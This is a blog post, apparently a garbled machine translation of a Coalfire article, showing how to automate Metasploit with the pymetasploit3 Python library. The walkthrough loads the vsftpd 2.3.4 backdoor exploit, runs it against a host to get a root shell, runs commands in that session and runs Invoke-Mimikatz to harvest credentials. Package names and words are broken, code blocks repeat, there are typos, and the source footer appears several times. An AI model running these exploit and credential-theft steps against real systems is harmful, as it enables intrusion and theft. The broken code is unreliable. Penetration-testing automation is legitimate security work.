pymetasploit3 – metasploit Automation Library

Dan McInerney, senior security advisor, coalfire, May 20, 2019

Do you have a list of tasks to perform for each penetration test project, such as SSH brute force cracking or port mapping? Or use Python and Metasploit to automate it! Unfortunately, however, there has not been a full-featured Python library for many years to simplify this work until today.

Pymetasploit3 is built on the pymetasploit Library of allfro. It makes it easier to automate Metasploit. Because pymetasploit3 uses a version of Python 3, you can also use the power of Python 3's asyncio library and perform automation tasks.

install

mkdir your-new-project-directory
 cd your-new-project-directory 
pipenv install –three pyme tasploit3
 pipenv shell

perhaps

pip install --user pyme tasploit3

Start Metasploit RPC server

Execute msfconsole or msfrpcd

Msfconsole

$ Msfconsole
msf> load msgrpc Pass=你的密码

Msfrpcd

$ msfrpcd -P 你的密码

Usage

Now you are ready to interact with Metasploit. If you want to connect to the msfrpcd service, you need to create an RPC client like this:

>>> from pymetasploit3.msfrpc import *
 >>> client = MsfRpcClient(‘你的密码')

Connect to msfconsole RPC plugin:

>>> from pymetasploit3.msfrpc import *
 >>> client = MsfRpcClient('你的密码', port=55553)

RPC client is the core of the library, and all functions are directly from this object. You can easily view Python library objects using dir():

>>> [m for m in dir(client) if not m.startswith('_')]


>>> ['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins', 'port', 'server', 'token', 'sessions', 'ssl', 'uri']


>>>

>>> [m for m in dir(client) if not m.startswith('_')] 
>>> ['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins', 'port', 'server', 'token', 'sessions', 'ssl', 'uri']
 >>> 让我们来看下exploit 模块：

>>> client.modules.exploit

['windows/wins/ms04_045_wins', 'windows/winrm/winrm_sc ript_exec', 'windows/vpn/safenet_ike_11',

'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...

'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']

>>>

>>> client.modules.exploit

['windows/wins/ms04_045_wins', 'windows/winrm/winrm_sc ript_exec', 'windows/vpn/safenet_ike_11',

'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...

'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']

>

It's easy to create an exploit module object. Pass in the module type and module name through client. Modules. Use().

>>> exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
>>>

Now let's set the module options. Let's first look at which goals are available and set the right ones.

>>> exploit.targets


{0: 'Automatic'}

>>>


>>> exploit.default_target


0


>>>

>>> exploit.targets


{0: 'Automatic'}

> >

>>> exploit.default_target


> >

In this case, there is only one target and it has been set to default. You can use a vulnerability with multiple targets and set it:

>>> exploit.target = 0


0


>>>

>>> exploit.target = 0


> >

Let's find the payload for this target:

>>> exploit.targetpayloads()


['cmd/unix/interact']


>>>

>>> exploit.targetpayloads()


['cmd/unix/interact']


>

The next step is to view and set module options.

>>> exploit.options 
['WORKSPACE', 'VERBOSE', 'WfsDelay', 'EnableContextEncoding', 'ContextInformationFile', 'DisablePayloadHandler', 'RHOSTS', 'RPORT', 'SSL', 'SSLVersion', 'SSLVerifyMode', 'SSLCipher', 'Proxies', 'CPORT', 'CHOST', 'ConnectTimeout', 'TCP::max_send_size', 'TCP::send_delay'] 
>>>

Most of the above options have default values set, but how do we know which options must be set, and how do we set them?

>>> expoit.missing_required 
['RHOSTS'] 
>>> exploit[‘RHOSTS’] = 192.168.1.2
 >>> exploit.runoptions 
{'VERBOSE': False, 'WfsDelay': 0, 'EnableContextEncoding': False, 'DisablePayloadHandler': False, 'RPORT': 21, 'SSL': False, 'SSLVersion': 'Auto', 'SSLVerifyMode': 'PEER', 'ConnectTimeout': 10, 'TCP::max_send_size': 0, 'TCP::send_delay': 0, 'RHOSTS': '192.168.1.2'} 
>>>

We can see in the above output that we have successfully set rhosts to 192.168.1.2. Now we are ready to pop up the shell by running a vulnerability in the Metasploit console. The Metasploit console is a prompt given when you start Metasploit with the command msfconsole, but you can also create a console if you start Metasploit using the RPC daemons with msfrpcd. Next, we will create a new console, get its console ID, and run the exploit module within the console so that we can collect the output of the module.

>>> console_id = client.consoles.console().cid
 >>> console = client.consoles.console(console_id)
 >>> console.run_module_with_output(exploit, payload=’cmd/unix/interact’)
 # Some time passes
 'VERBOSE => false\nWfsDelay => 0 [...] [*] 192.168.1.2:21 - Banner: 220 vsFTPd 2.3.4\n[*] 192.168.1.2:21 - USER: 331 Please specify the password
[...]' 
>>>

Now we have a conversation, let's interact with it. Client.sessions.list will return a dictionary where each key is a session identifier and the session data will be stored as a value.

>>> client.sessions.list
 {'1': {'info': '', 'username': 'jsmith', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '192.168.1.2:6200', 'workspace': 'false', 'routes': '',
'target_host': '192.168.1.2', 'type': 'shell', 'session_host': '192.168.1.2', 'desc': 'Command shell'}} 
>>> shell = client.sessions.session('1')
 >>> shell.write('whoami')
 >>> shell.read()
'\nroot'
 >>>

>>> client.sessions.list
{'1': {'info': '', 'username': 'jsmith', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '192.168.1.2:6200', 'workspace': 'false', 'routes': '', 
'target_host': '192.168.1.2', 'type': 'shell', 'session_host': '192.168.1.2', 'desc': 'Command shell'}}
>>> shell = client.sessions.session('1')
>>> shell.write('whoami')
>>> shell.read()
'\nroot'
>>>

Suppose you want to run a command in this session, wait for the command to complete, and return the output of the command. This is simple in the console, because each console tells you if it is still running the last command you sent.

>>> console.is_busy()
 False
 >>>

Unfortunately, sessions do not come from the session built-in capabilities provided by Metasploit. There are three ways to solve this problem. Option 1 waits for any data to be read from the session and returned. This is very effective for system commands that print all data at once. Next, we will run the ARP command on the remote session and return as soon as we receive any data.

>>> cmd = 'arp'
 >>> shell.run_with_output(cmd)
 '\n Address                  HWtype  HWaddress           Flags Mask […]' 
>>>

Option 2 is to wait for a period of time and then return all data after that time. One detail to note is that by default, Metasploit's communication timeout is 300 seconds. If you want to run a command that takes more than 300 seconds, you must set the Metasploit communication timeout as well as the run with output() timeout. For example, to change the communication timeout of the meterpreter shell to 500 seconds, run set ﹣ timeouts - C 500 in the meterpreter shell. The shell in the following example is still the same simple Linux Shell we used in the previous example, so it's not necessary.

>>> cmd = 'arp' 
>>> shell.run_with_output(cmd, timeout=10s, timeout_exception=False)
 # 10 seconds pass
'\n Address                  HWtype  HWaddress           Flags Mask […]' 
>>>

Option 3 is to stop collecting data when a string is found. For very complex commands, this is usually the most consistent. Next we'll look up the strings "address" and "hwtype," which we know exists in the output of the ARP command on Linux. The strings' [-] 'and' [+] 'are usually good default end strings when processing a meterpreter session, because when a command completes or fails, Metasploit usually uses these strings in its output. However, the output of Metasploit is inconsistent from one command to the next, so be careful to choose a consistent end string, otherwise you may read the data buffer later and let the output of the previous command disturb the output of your new command. As long as a selected end string is read in the output of the session, all data collected before that time is returned.

>>> cmd = 'arp'
 >>> end_strs = ['Address', 'HWtype']
 >>> shell.run_with_output(cmd, end_strs=end_strs)
 '\n Address                  HWtype  HWaddress           Flags Mask […]'
 >>>

Assuming you get the Meterpreter shell on a Windows host, you can also run the PowerShell command.

>>> met_shell = client.sessions.session('2')
 >>> psh_sc ript = '/home/user/sc ripts/Invoke-Mimikatz.ps1'
 >>> met_shell.import_psh(psh_sc ript)
 >>> met_shell.run_psh_cmd('Invoke-Mimikatz') 
# Some time passes
'Mimikatz output…' 
>>>

>>> met_shell = client.sessions.session('2')
>>> psh_sc ript = '/home/user/sc ripts/Invoke-Mimikatz.ps1'
>>> met_shell.import_psh(psh_sc ript)
>>> met_shell.run_psh_cmd('Invoke-Mimikatz')
# Some time passes
'Mimikatz output… > >

This provides an overview of the basic functions of pymetasploit 3. Now replace your tool with a small Python script.

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场 来源：https://www.coalfire.com/The-Coalfire-Blog/May-2019/pymetasploit3-Metasploit-Automation-Library 本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场 来源：https://www.coalfire.com/The-Coalfire-Blog/May-2019/pymetasploit3-Metasploit-Automation-Library 本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场 来源：https://www.coalfire.com/The-Coalfire-Blog/May-2019/pymetasploit3-Metasploit-Automation-Library 本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场 来源：https://www.coalfire.com/The-Coalfire-Blog/May-2019/pymetasploit3-Metasploit-Automation-Library